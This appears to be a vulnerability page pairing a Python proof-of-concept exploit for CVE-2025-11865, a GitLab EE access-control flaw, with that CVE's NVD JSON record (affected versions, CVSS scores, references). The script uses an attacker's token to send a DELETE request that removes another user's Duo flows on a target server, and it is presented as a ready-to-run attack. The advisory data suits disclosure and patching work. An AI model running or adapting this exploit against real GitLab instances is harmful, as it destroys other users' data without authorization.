CVE-2025-11865

# CVE-2025-11865 PoC - GitLab EE Unauthorized Duo Flows Removal # This PoC demonstrates the access control bypass vulnerability import requests import json TARGET_GITLAB_URL = "https://gitlab.example.com" ATTACKER_TOKEN = "glpat-attacker-token-here" TARGET_USER_ID = "victim-user-id" def delete_duo_flows(): """ Exploit the CVE-2025-11865 vulnerability to remove another user's Duo flows """ headers = { "PRIVATE-TOKEN": ATTACKER_TOKEN, "Content-Type": "application/json" } # Target endpoint for Duo flows deletion endpoint = f"{TARGET_GITLAB_URL}/api/v4/users/{TARGET_USER_ID}/duo_flows" try: # Send DELETE request - this should fail with proper auth check response = requests.delete(endpoint, headers=headers, timeout=10) if response.status_code == 204 or response.status_code == 200: print("[+] SUCCESS: Target user's Duo flows removed!") print(f"[+] Response: {response.text}") return True else: print(f"[-] FAILED: Status code {response.status_code}") print(f"[-] Response: {response.text}") return False except requests.exceptions.RequestException as e: print(f"[-] ERROR: {str(e)}") return False if __name__ == "__main__": print("CVE-2025-11865 PoC - GitLab EE Unauthorized Duo Flows Removal") print("=" * 70) delete_duo_flows()

{"cve": {"id": "CVE-2025-11865", "sourceIdentifier": "[email protected]", "published": "2025-11-15T08:15:43.547", "lastModified": "2025-11-19T17:59:17.653", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue has been discovered in GitLab EE affecting all versions from 18.1 before 18.3.6, 18.4 before 18.4.4, and 18.5 before 18.5.2 that, under certain circumstances, could have allowed an attacker to remove Duo flows of another user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.1.0", "versionEndExcluding": "18.3.6", "matchCriteriaId": "0AC48ED5-5EF8-477F-A9F9-E08BE928EC6A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.4.4", "matchCriteriaId": "6D0A238D-1278-4D05-86F5-4C323E0CFE36"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.2", "matchCriteriaId": "B2A3A57F-C750-4C92-8C2B-C5FCF1D70F4F"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/11/12/patch-release-gitlab-18-5-2-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/561399", "source": "[email protected]", "tags": ["Broken Link"]}]}}